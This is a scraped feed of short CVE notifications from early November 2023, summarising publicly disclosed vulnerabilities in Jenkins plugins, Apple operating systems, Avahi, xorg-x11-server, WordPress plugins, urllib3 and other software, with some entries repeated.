🚨 CVE-2023-41355Chunghwa Telecom NOKIA G-040W-Q Firewall function has a vulnerability of input validation for ICMP redirect messages. An unauthenticated remote attacker can exploit this vulnerability by sending a crafted package to modify the network routing table, resulting in a denial of service or sensitive information leaking.🎖@cveNotify |
|
| 2023-11-03 10:22:04 |
🚨 CVE-2023-38965Lost and Found Information System 1.0 allows account takeover via username and password to a /classes/Users.php?f=save URI.🎖@cveNotify |
|
| 2023-11-03 10:22:03 |
🚨 CVE-2023-41164In Django 3.2 before 3.2.21, 4.1 before 4.1.11, and 4.2 before 4.2.5, django.utils.encoding.uri_to_iri() is subject to a potential DoS (denial of service) attack via certain inputs with a very large number of Unicode characters.🎖@cveNotify |
|
| 2023-11-03 10:22:01 |
🚨 CVE-2023-41259Best Practical Request Tracker (RT) before 4.4.7 and 5.x before 5.0.5 allows Information Disclosure via fake or spoofed RT email headers in an email message or a mail-gateway REST API call.🎖@cveNotify |
|
| 2023-11-03 10:22:00 |
🚨 CVE-2023-41260Best Practical Request Tracker (RT) before 4.4.7 and 5.x before 5.0.5 allows Information Exposure in responses to mail-gateway REST API calls.🎖@cveNotify |
|
| 2023-11-03 10:21:59 |
🚨 CVE-2023-41343Rogic No-Code Database Builder's file uploading function has insufficient filtering for special characters. A remote attacker with regular user privilege can inject JavaScript to perform XSS (Stored Cross-Site Scripting) attack.🎖@cveNotify |
|
| 2023-11-03 10:21:58 |
🚨 CVE-2023-41350Chunghwa Telecom NOKIA G-040W-Q has a vulnerability of insufficient measures to prevent multiple failed authentication attempts. An unauthenticated remote attacker can execute a crafted Javascript to expose captcha in page, making it very easy for bots to bypass the captcha check and more susceptible to brute force attacks.🎖@cveNotify |
|
| 2023-11-03 10:21:57 |
🚨 CVE-2023-41914SchedMD Slurm 23.02.x before 23.02.6 and 22.05.x before 22.05.10 allows filesystem race conditions for gaining ownership of a file, overwriting a file, or deleting files.🎖@cveNotify |
|
| 2023-11-03 05:52:32 |
🚨 CVE-2023-45803urllib3 is a user-friendly HTTP client library for Python. urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 301, 302, or 303 after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although this behavior is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers. Because the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable. Both of the following conditions must be true to be affected by this vulnerability: 1. Using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON) and 2. The origin service is compromised and starts redirecting using 301, 302, or 303 to a malicious peer or the redirected-to service becomes compromised. This issue has been addressed in versions 1.26.18 and 2.0.7 and users are advised to update to resolve this issue. Users unable to update should disable redirects for services that aren't expecting to respond with redirects with `redirects=False` and disable automatic redirects with `redirects=False` and handle 301, 302, and 303 redirects manually by stripping the HTTP request body.🎖@cveNotify |
|
| 2023-11-03 05:52:30 |
🚨 CVE-2022-34300In tinyexr 1.0.1, there is a heap-based buffer over-read in tinyexr::DecodePixelData.🎖@cveNotify |
|
| 2023-11-03 05:52:29 |
🚨 CVE-2022-29529An issue was discovered in MISP before 2.4.158. There is stored XSS via the LinOTP login field.🎖@cveNotify |
|
| 2023-11-03 05:52:27 |
🚨 CVE-2022-25318An issue was discovered in Cerebrate through 1.4. An incorrect sharing group ACL allowed an unprivileged user to edit and modify sharing groups.🎖@cveNotify |
|
| 2023-11-03 05:52:26 |
🚨 CVE-2022-34185Jenkins Date Parameter Plugin 0.0.4 and earlier does not escape the name and description of Date parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-03 05:52:24 |
🚨 CVE-2022-34187Jenkins Filesystem List Parameter Plugin 0.0.7 and earlier does not escape the name and description of File system objects list parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-03 05:52:23 |
🚨 CVE-2022-34186Jenkins Dynamic Extended Choice Parameter Plugin 1.0.1 and earlier does not escape the name and description of Moded Extended Choice parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-03 05:52:21 |
🚨 CVE-2022-30964Jenkins Multiselect parameter Plugin 1.3 and earlier does not escape the name and description of Multiselect parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-03 05:52:20 |
🚨 CVE-2022-30965Jenkins Promoted Builds (Simple) Plugin 1.9 and earlier does not escape the name and description of Promotion Level parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-03 05:52:19 |
🚨 CVE-2022-30966Jenkins Random String Parameter Plugin 1.0 and earlier does not escape the name and description of Random String parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-03 05:52:17 |
🚨 CVE-2022-34170In Jenkins 2.320 through 2.355 (both inclusive) and LTS 2.332.1 through LTS 2.332.3 (both inclusive) the help icon does not escape the feature name that is part of its tooltip, effectively undoing the fix for SECURITY-1955, resulting in a cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.🎖@cveNotify |
|
| 2023-11-03 05:52:16 |
🚨 CVE-2022-30963Jenkins JDK Parameter Plugin 1.0 and earlier does not escape the name and description of JDK parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-03 05:52:15 |
🚨 CVE-2022-30967Jenkins Selection tasks Plugin 1.0 and earlier does not escape the name and description of Script Selection task variable parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-03 05:52:13 |
🚨 CVE-2022-30968Jenkins vboxwrapper Plugin 1.3 and earlier does not escape the name and description of VBox node parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-03 05:52:12 |
🚨 CVE-2022-30970Jenkins Autocomplete Parameter Plugin 1.1 and earlier references Dropdown Autocomplete parameter and Auto Complete String parameter names in an unsafe manner from Javascript embedded in view definitions, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-03 05:52:10 |
🚨 CVE-2022-34176Jenkins JUnit Plugin 1119.va_a_5e9068da_d7 and earlier does not escape descriptions of test results, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Run/Update permission.🎖@cveNotify |
|
| 2023-11-03 05:52:09 |
🚨 CVE-2022-34173In Jenkins 2.340 through 2.355 (both inclusive) the tooltip of the build button in list views supports HTML without escaping the job display name, resulting in a cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.🎖@cveNotify |
|
| 2023-11-03 05:52:08 |
🚨 CVE-2022-34172In Jenkins 2.340 through 2.355 (both inclusive) symbol-based icons unescape previously escaped values of 'tooltip' parameters, resulting in a cross-site scripting (XSS) vulnerability.🎖@cveNotify |
|
| 2023-11-03 05:52:07 |
🚨 CVE-2022-34171In Jenkins 2.321 through 2.355 (both inclusive) and LTS 2.332.1 through LTS 2.332.3 (both inclusive) the HTML output generated for new symbol-based SVG icons includes the 'title' attribute of 'l:ionicon' (until Jenkins 2.334) and 'alt' attribute of 'l:icon' (since Jenkins 2.335) without further escaping, resulting in a cross-site scripting (XSS) vulnerability.🎖@cveNotify |
|
| 2023-11-03 05:52:05 |
🚨 CVE-2022-34184Jenkins CRX Content Package Deployer Plugin 1.9 and earlier does not escape the name and description of CRX Content Package Choice parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-03 01:22:25 |
🚨 CVE-2023-39051An information leak in VISION MEAT WORKS Track Diner 10/10mbl v13.6.1 allows attackers to obtain the channel access token and send crafted messages.🎖@cveNotify |
|
| 2023-11-03 01:22:24 |
🚨 CVE-2023-39053An information leak in Hattoriya v13.6.1 allows attackers to obtain the channel access token and send crafted messages.🎖@cveNotify |
|
| 2023-11-03 01:22:23 |
🚨 CVE-2023-39054An information leak in Tokudaya.ekimae_mc v13.6.1 allows attackers to obtain the channel access token and send crafted messages.🎖@cveNotify |
|
| 2023-11-03 01:22:21 |
🚨 CVE-2023-39057An information leak in hirochanKAKIwaiting v13.6.1 allows attackers to obtain the channel access token and send crafted messages.🎖@cveNotify |
|
| 2023-11-03 01:22:20 |
🚨 CVE-2023-39283An SMM memory corruption vulnerability in the SMM driver (SMRAM write) in CsmInt10HookSmm in Insyde InsydeH2O with kernel 5.0 through 5.5 allows attackers to send arbitrary data to SMM which could lead to privilege escalation.🎖@cveNotify |
|
| 2023-11-03 01:22:19 |
🚨 CVE-2023-42299Buffer Overflow vulnerability in OpenImageIO oiio v.2.4.12.0 allows a remote attacker to execute arbitrary code and cause a denial of service via the read_subimage_data function.🎖@cveNotify |
|
| 2023-11-03 01:22:18 |
🚨 CVE-2023-43194Submitty before v22.06.00 is vulnerable to Incorrect Access Control. An attacker can delete any post in the forum by modifying request parameter.🎖@cveNotify |
|
| 2023-11-03 01:22:16 |
🚨 CVE-2023-46352In the module "Pixel Plus: Events + CAPI + Pixel Catalog for Facebook Module" (facebookconversiontrackingplus) up to version 2.4.9 from Smart Modules for PrestaShop, a guest can download personal information without restriction. Due to a lack of permissions control, a guest can access exports from the module which can lead to a leak of personal information from ps_customer table such as name / surname / email.🎖@cveNotify |
|
| 2023-11-03 01:22:15 |
🚨 CVE-2023-46958An issue in lmxcms v.1.41 allows a remote attacker to execute arbitrary code via a crafted script to the admin.php file.🎖@cveNotify |
|
| 2023-11-03 01:22:14 |
🚨 CVE-2021-21603Jenkins 2.274 and earlier, LTS 2.263.1 and earlier does not escape notification bar response contents, resulting in a cross-site scripting (XSS) vulnerability.🎖@cveNotify |
|
| 2023-11-03 01:22:12 |
🚨 CVE-2020-2317Jenkins FindBugs Plugin 5.0.0 and earlier does not escape the annotation message in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to provide report files to Jenkins FindBugs Plugin's post build step.🎖@cveNotify |
|
| 2023-11-03 01:22:11 |
🚨 CVE-2020-2316Jenkins Static Analysis Utilities Plugin 1.96 and earlier does not escape the annotation message in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.🎖@cveNotify |
|
| 2023-11-03 01:22:10 |
🚨 CVE-2021-21610Jenkins 2.274 and earlier, LTS 2.263.1 and earlier does not implement any restrictions for the URL rendering a formatted preview of markup passed as a query parameter, resulting in a reflected cross-site scripting (XSS) vulnerability if the configured markup formatter does not prohibit unsafe elements (JavaScript) in markup.🎖@cveNotify |
|
| 2023-11-03 01:22:09 |
🚨 CVE-2021-21608Jenkins 2.274 and earlier, LTS 2.263.1 and earlier does not escape button labels in the Jenkins UI, resulting in a cross-site scripting (XSS) vulnerability exploitable by attackers with the ability to control button labels.🎖@cveNotify |
|
| 2023-11-03 01:22:08 |
🚨 CVE-2021-21611Jenkins 2.274 and earlier, LTS 2.263.1 and earlier does not escape display names and IDs of item types shown on the New Item page, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to specify display names or IDs of item types.🎖@cveNotify |
|
| 2023-11-03 01:22:06 |
🚨 CVE-2022-30956Jenkins Rundeck Plugin 3.6.10 and earlier does not restrict URL schemes in Rundeck webhook submissions, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to submit crafted Rundeck webhook payloads.🎖@cveNotify |
|
| 2023-11-03 01:22:05 |
🚨 CVE-2022-29046Jenkins Subversion Plugin 2.15.3 and earlier does not escape the name and description of List Subversion tags (and more) parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-03 01:22:04 |
🚨 CVE-2021-21619Jenkins Claim Plugin 2.18.1 and earlier does not escape the user display name, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers who are able to control the display names of Jenkins users, either via the security realm, or directly inside Jenkins.🎖@cveNotify |
|
| 2023-11-03 01:22:02 |
🚨 CVE-2021-21618Jenkins Repository Connector Plugin 2.0.2 and earlier does not escape parameter names and descriptions for past builds, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-11-03 01:22:01 |
🚨 CVE-2021-21616Jenkins Active Choices Plugin 2.5.2 and earlier does not escape reference parameter values, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.🎖@cveNotify |
|
| 2023-11-02 20:52:25 |
🚨 CVE-2023-31026NVIDIA vGPU software for Windows and Linux contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where a NULL-pointer dereference may lead to denial of service.🎖@cveNotify |
|
| 2023-11-02 20:52:23 |
🚨 CVE-2023-31027NVIDIA GPU Display Driver for Windows contains a vulnerability that allows Windows users with low levels of privilege to escalate privileges when an administrator is updating GPU drivers, which may lead to escalation of privileges.🎖@cveNotify |
|
| 2023-11-02 20:52:22 |
🚨 CVE-2023-5923A vulnerability classified as critical has been found in Campcodes Simple Student Information System 1.0. This affects an unknown part of the file /admin/index.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-244323.🎖@cveNotify |
|
| 2023-11-02 20:52:21 |
🚨 CVE-2023-5924A vulnerability classified as critical was found in Campcodes Simple Student Information System 1.0. This vulnerability affects unknown code of the file /admin/courses/view_course.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-244324.🎖@cveNotify |
|
| 2023-11-02 20:52:19 |
🚨 CVE-2023-5746A vulnerability regarding use of externally-controlled format string is found in the cgi component. This allows remote attackers to execute arbitrary code via unspecified vectors. The following models with Synology Camera Firmware versions before 1.0.5-0185 may be affected: BC500 and TC500.🎖@cveNotify |
|
| 2023-11-02 20:52:18 |
🚨 CVE-2023-5744The Very Simple Google Maps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'vsgmap' shortcode in all versions up to, and including, 2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-11-02 20:52:17 |
🚨 CVE-2023-5740The Live Chat with Facebook Messenger plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'messenger' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-11-02 20:52:16 |
🚨 CVE-2023-42850The issue was addressed with improved permissions logic. This issue is fixed in macOS Sonoma 14.1. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2023-11-02 20:52:15 |
🚨 CVE-2023-42852A logic issue was addressed with improved checks. This issue is fixed in iOS 17.1 and iPadOS 17.1, watchOS 10.1, iOS 16.7.2 and iPadOS 16.7.2, macOS Sonoma 14.1, Safari 17.1, tvOS 17.1. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-11-02 20:52:14 |
🚨 CVE-2022-4900A vulnerability was found in PHP where setting the environment variable PHP_CLI_SERVER_WORKERS to a large value leads to a heap buffer overflow.🎖@cveNotify |
|
| 2023-11-02 20:52:12 |
🚨 CVE-2023-38473A vulnerability was found in Avahi. A reachable assertion exists in the avahi_alternative_host_name() function.🎖@cveNotify |
|
| 2023-11-02 20:52:11 |
🚨 CVE-2023-46925Reportico 7.1.21 is vulnerable to Cross Site Scripting (XSS).🎖@cveNotify |
|
| 2023-11-02 20:52:10 |
🚨 CVE-2023-4217A vulnerability has been identified in PT-G503 Series versions prior to v5.2, where the session cookies attribute is not set properly in the affected application. The vulnerability may lead to security risks, potentially exposing user session data to unauthorized access and manipulation.🎖@cveNotify |
|
| 2023-11-02 20:52:08 |
🚨 CVE-2023-5035A vulnerability has been identified in PT-G503 Series firmware versions prior to v5.2, where the Secure attribute for sensitive cookies in HTTPS sessions is not set, which could cause the cookie to be transmitted in plaintext over an HTTP session. The vulnerability may lead to security risks, potentially exposing user session data to unauthorized access and manipulation.🎖@cveNotify |
|
| 2023-11-02 20:52:07 |
🚨 CVE-2023-5846Franklin Fueling System TS-550 versions prior to 1.9.23.8960 are vulnerable to attackers decoding admin credentials, resulting in unauthenticated access to the device.🎖@cveNotify |
|
| 2023-11-02 20:52:06 |
🚨 CVE-2023-38469A vulnerability was found in Avahi, where a reachable assertion exists in avahi_dns_packet_append_record.🎖@cveNotify |
|
| 2023-11-02 20:52:05 |
🚨 CVE-2023-38470A vulnerability was found in Avahi. A reachable assertion exists in the avahi_escape_label() function.🎖@cveNotify |
|
| 2023-11-02 20:52:01 |
🚨 CVE-2023-38471A vulnerability was found in Avahi. A reachable assertion exists in the dbus_set_host_name function.🎖@cveNotify |
|
| 2023-11-02 20:51:59 |
🚨 CVE-2023-38472A vulnerability was found in Avahi. A reachable assertion exists in the avahi_rdata_parse() function.🎖@cveNotify |
|
| 2023-11-02 20:51:58 |
🚨 CVE-2023-45338Online Food Ordering System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'id' parameter of the routers/add-ticket.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-11-02 18:52:25 |
🚨 CVE-2023-42854This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Sonoma 14.1, macOS Monterey 12.7.1, macOS Ventura 13.6.1. An app may be able to cause a denial-of-service to Endpoint Security clients.🎖@cveNotify |
|
| 2023-11-02 18:52:23 |
🚨 CVE-2023-5043Ingress nginx annotation injection causes arbitrary command execution.🎖@cveNotify |
|
| 2023-11-02 18:52:21 |
🚨 CVE-2023-40404A use-after-free issue was addressed with improved memory management. This issue is fixed in macOS Sonoma 14.1. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-11-02 18:52:19 |
🚨 CVE-2023-5044Code injection via nginx.ingress.kubernetes.io/permanent-redirect annotation.🎖@cveNotify |
|
| 2023-11-02 18:52:17 |
🚨 CVE-2023-40405A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.1. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2023-11-02 18:52:16 |
🚨 CVE-2023-5367A out-of-bounds write flaw was found in the xorg-x11-server. This issue occurs due to an incorrect calculation of a buffer offset when copying data stored in the heap in the XIChangeDeviceProperty function in Xi/xiproperty.c and in RRChangeOutputProperty function in randr/rrproperty.c, allowing for possible escalation of privileges or denial of service.🎖@cveNotify |
|
| 2023-11-02 18:52:15 |
🚨 CVE-2023-5380A use-after-free flaw was found in the xorg-x11-server. An X server crash may occur in a very specific and legacy configuration (a multi-screen setup with multiple protocol screens, also known as Zaphod mode) if the pointer is warped from within a window on one screen to the root window of the other screen and if the original window is destroyed followed by another window being destroyed.🎖@cveNotify |
|
| 2023-11-02 18:52:14 |
🚨 CVE-2023-46925Reportico 7.1.21 is vulnerable to Cross Site Scripting (XSS).🎖@cveNotify |
|
| 2023-11-02 18:52:12 |
🚨 CVE-2023-4217A vulnerability has been identified in PT-G503 Series versions prior to v5.2, where the session cookies attribute is not set properly in the affected application. The vulnerability may lead to security risks, potentially exposing user session data to unauthorized access and manipulation.🎖@cveNotify |
|
| 2023-11-02 18:52:10 |
🚨 CVE-2023-5035A vulnerability has been identified in PT-G503 Series firmware versions prior to v5.2, where the Secure attribute for sensitive cookies in HTTPS sessions is not set, which could cause the cookie to be transmitted in plaintext over an HTTP session. The vulnerability may lead to security risks, potentially exposing user session data to unauthorized access and manipulation.🎖@cveNotify |
|
| 2023-11-02 18:52:08 |
🚨 CVE-2023-5846Franklin Fueling System TS-550 versions prior to 1.9.23.8960 are vulnerable to attackers decoding admin credentials, resulting in unauthenticated access to the device.🎖@cveNotify |
|
| 2023-11-02 18:52:06 |
🚨 CVE-2023-46255SpiceDB is an open source, Google Zanzibar-inspired database for creating and managing security-critical application permissions. Prior to version 1.27.0-rc1, when the provided datastore URI is malformed (e.g. by having a password which contains `:`) the full URI (including the provided password) is printed, so that the password is shown in the logs. Version 1.27.0-rc1 patches this issue.🎖@cveNotify |
|
| 2023-11-02 18:52:05 |
🚨 CVE-2023-5574A use-after-free flaw was found in xorg-x11-server-Xvfb. This issue occurs in Xvfb with a very specific and legacy configuration (a multi-screen setup with multiple protocol screens, also known as Zaphod mode). If the pointer is warped from a screen 1 to a screen 0, a use-after-free issue may be triggered during shutdown or reset of the Xvfb server, allowing for possible escalation of privileges or denial of service.🎖@cveNotify |
|
| 2023-11-02 18:52:03 |
🚨 CVE-2023-33186Zulip is an open-source team collaboration tool with unique topic-based threading that combines the best of email and chat to make remote work productive and delightful. The main development branch of Zulip Server from May 2, 2023 and later, including beta versions 7.0-beta1 and 7.0-beta2, is vulnerable to a cross-site scripting vulnerability in tooltips on the message feed. An attacker who can send messages could maliciously craft a topic for the message, such that a victim who hovers the tooltip for that topic in their message feed triggers execution of JavaScript code controlled by the attacker.🎖@cveNotify |
|
| 2023-11-02 18:52:02 |
🚨 CVE-2023-42841The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.1, iOS 17.1 and iPadOS 17.1, iOS 16.7.2 and iPadOS 16.7.2, macOS Ventura 13.6.1. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-11-02 18:52:00 |
🚨 CVE-2022-4900A vulnerability was found in PHP where setting the environment variable PHP_CLI_SERVER_WORKERS to a large value leads to a heap buffer overflow.🎖@cveNotify |
|
| 2023-11-02 18:51:59 |
🚨 CVE-2023-38473A vulnerability was found in Avahi. A reachable assertion exists in the avahi_alternative_host_name() function.🎖@cveNotify |
|
| 2023-11-02 15:22:14 |
🚨 CVE-2023-40425A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Monterey 12.7.1. An app with root privileges may be able to access private information.🎖@cveNotify |
|
| 2023-11-02 15:22:13 |
🚨 CVE-2023-40408An inconsistent user interface issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.1, watchOS 10.1, iOS 16.7.2 and iPadOS 16.7.2, iOS 17.1 and iPadOS 17.1. Hide My Email may be deactivated unexpectedly.🎖@cveNotify |
|
| 2023-11-02 15:22:11 |
🚨 CVE-2023-40423The issue was addressed with improved memory handling. This issue is fixed in iOS 17.1 and iPadOS 17.1, macOS Monterey 12.7.1, iOS 16.7.2 and iPadOS 16.7.2, macOS Ventura 13.6.1, macOS Sonoma 14.1. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-11-02 15:22:10 |
🚨 CVE-2023-40421A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sonoma 14.1, macOS Monterey 12.7.1, macOS Ventura 13.6.1. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2023-11-02 15:22:09 |
🚨 CVE-2023-40413The issue was addressed with improved handling of caches. This issue is fixed in iOS 17.1 and iPadOS 17.1, macOS Monterey 12.7.1, watchOS 10.1, iOS 16.7.2 and iPadOS 16.7.2, macOS Ventura 13.6.1, macOS Sonoma 14.1. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2023-11-02 15:22:08 |
🚨 CVE-2023-40416The issue was addressed with improved memory handling. This issue is fixed in iOS 17.1 and iPadOS 17.1, macOS Monterey 12.7.1, iOS 16.7.2 and iPadOS 16.7.2, macOS Ventura 13.6.1, macOS Sonoma 14.1. Processing an image may result in disclosure of process memory.🎖@cveNotify |
|
| 2023-11-02 15:22:07 |
🚨 CVE-2023-26219The Hawk Console and Hawk Agent components of TIBCO Software Inc.'s TIBCO Hawk, TIBCO Hawk Distribution for TIBCO Silver Fabric, TIBCO Operational Intelligence Hawk RedTail, and TIBCO Runtime Agent contain a vulnerability that theoretically allows an attacker with access to the Hawk Console’s and Agent’s log to obtain credentials used to access associated EMS servers. Affected releases are TIBCO Software Inc.'s TIBCO Hawk: versions 6.2.2 and below, TIBCO Hawk Distribution for TIBCO Silver Fabric: versions 6.2.2 and below, TIBCO Operational Intelligence Hawk RedTail: versions 7.2.1 and below, and TIBCO Runtime Agent: versions 5.12.2 and below.🎖@cveNotify |
|
| 2023-11-02 15:22:05 |
🚨 CVE-2023-46475A Stored Cross-Site Scripting vulnerability was discovered in ZenTao 18.3 where a user can create a project, and in the name field of the project, they can inject malicious JavaScript code.🎖@cveNotify |
|
| 2023-11-02 15:22:04 |
🚨 CVE-2023-46542TOTOLINK X2000R Gh v1.0.0-B20230221.0948.web was discovered to contain a stack overflow via the function formMeshUploadConfig.🎖@cveNotify |
|
| 2023-11-02 15:22:03 |
🚨 CVE-2023-3164A heap out-of-bounds read flaw was found in builtin.c in the gawk package. This issue may lead to a crash and could be used to read sensitive information.🎖@cveNotify |
|
| 2023-11-02 15:22:01 |
🚨 CVE-2023-43193Submitty before v22.06.00 is vulnerable to Cross Site Scripting (XSS). An attacker can create a malicious link in the forum that leads to XSS.🎖@cveNotify |
|
| 2023-11-02 15:22:00 |
🚨 CVE-2023-43336Sangoma Technologies FreePBX before cdr 15.0.18, 16.0.40, 15.0.16, and 16.0.17 was discovered to contain an access control issue via a modified parameter value, e.g., changing extension=self to extension=101.🎖@cveNotify |
|
| 2023-11-02 15:21:59 |
🚨 CVE-2023-5860The Icons Font Loader plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the upload function in all versions up to, and including, 1.1.2. This makes it possible for authenticated attackers, with administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2023-11-02 15:21:58 |
🚨 CVE-2023-5918A vulnerability, which was classified as critical, was found in SourceCodester Visitor Management System 1.0. Affected is an unknown function of the file manage_user.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-244308.🎖@cveNotify |
|
| 2023-11-02 12:52:10 |
🚨 CVE-2023-43076Dell PowerScale OneFS 8.2.x,9.0.0.x-9.5.0.x contains a denial-of-service vulnerability. A low privilege remote attacker could potentially exploit this vulnerability to cause an out of memory (OOM) condition.🎖@cveNotify |
|
| 2023-11-02 12:52:08 |
🚨 CVE-2023-43087Dell PowerScale OneFS 8.2.x, 9.0.0.x-9.5.0.x contains an improper handling of insufficient permissions. A low privileged remote attacker could potentially exploit this vulnerability to cause information disclosure.🎖@cveNotify |
|
| 2023-11-02 12:52:05 |
🚨 CVE-2023-5916A vulnerability classified as critical has been found in Lissy93 Dashy 2.1.1. This affects an unknown part of the file /config-manager/save of the component Configuration Handler. The manipulation of the argument config leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-244305 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-11-02 12:52:04 |
🚨 CVE-2023-5917A vulnerability, which was classified as problematic, has been found in phpBB up to 3.3.10. This issue affects the function main of the file phpBB/includes/acp/acp_icons.php of the component Smiley Pack Handler. The manipulation of the argument pak leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 3.3.11 is able to address this issue. The patch is named ccf6e6c255d38692d72fcb613b113e6eaa240aac. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-244307.🎖@cveNotify |
|
| 2023-11-02 12:52:01 |
🚨 CVE-2023-45160In the affected version of the 1E Client, an ordinary user could subvert downloaded instruction resource files, e.g., to substitute a harmful script. by replacing a resource script file created by an instruction at run time with a malicious script. The 1E Client's temporary directory is now locked down in the released patch.Resolution: This has been fixed in patch Q23094 This issue has also been fixed in the Mac Client in updated versions of Non-Windows release v8.1.2.62 - please re-download from the 1E Support site. Customers with Mac Client versions higher than v8.1 will need to upgrade to v23.11 to remediate this vulnerability.🎖@cveNotify |
|
| 2023-11-02 12:51:59 |
🚨 CVE-2023-3655cashIT! - serving solutions. Devices from "PoS/ Dienstleistung, Entwicklung & Vertrieb GmbH" to 03.A06rks 2023.02.37 are affected by a dangerous methods, that allows to leak the database (system settings, user accounts,...). This vulnerability can be triggered by an HTTP endpoint exposed to the network.🎖@cveNotify |
|
| 2023-11-02 12:51:58 |
🚨 CVE-2023-3656cashIT! - serving solutions. Devices from "PoS/ Dienstleistung, Entwicklung & Vertrieb GmbH" to 03.A06rks 2023.02.37 are affected by an unauthenticated remote code execution vulnerability. This vulnerability can be triggered by an HTTP endpoint exposed to the network.🎖@cveNotify |
|
| 2023-11-02 12:51:56 |
🚨 CVE-2023-3654cashIT! - serving solutions. Devices from "PoS/ Dienstleistung, Entwicklung & Vertrieb GmbH" to 03.A06rks 2023.02.37 are affected by a origin bypass via the host header in an HTTP request. This vulnerability can be triggered by an HTTP endpoint exposed to the network.🎖@cveNotify |
|
| 2023-11-02 10:52:11 |
🚨 CVE-2023-5606The ChatBot for WordPress is vulnerable to Stored Cross-Site Scripting via the FAQ Builder in versions 4.8.6 through 4.9.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. NOTE: This vulnerability is a re-introduction of CVE-2023-4253.🎖@cveNotify |
|
| 2023-11-02 10:52:10 |
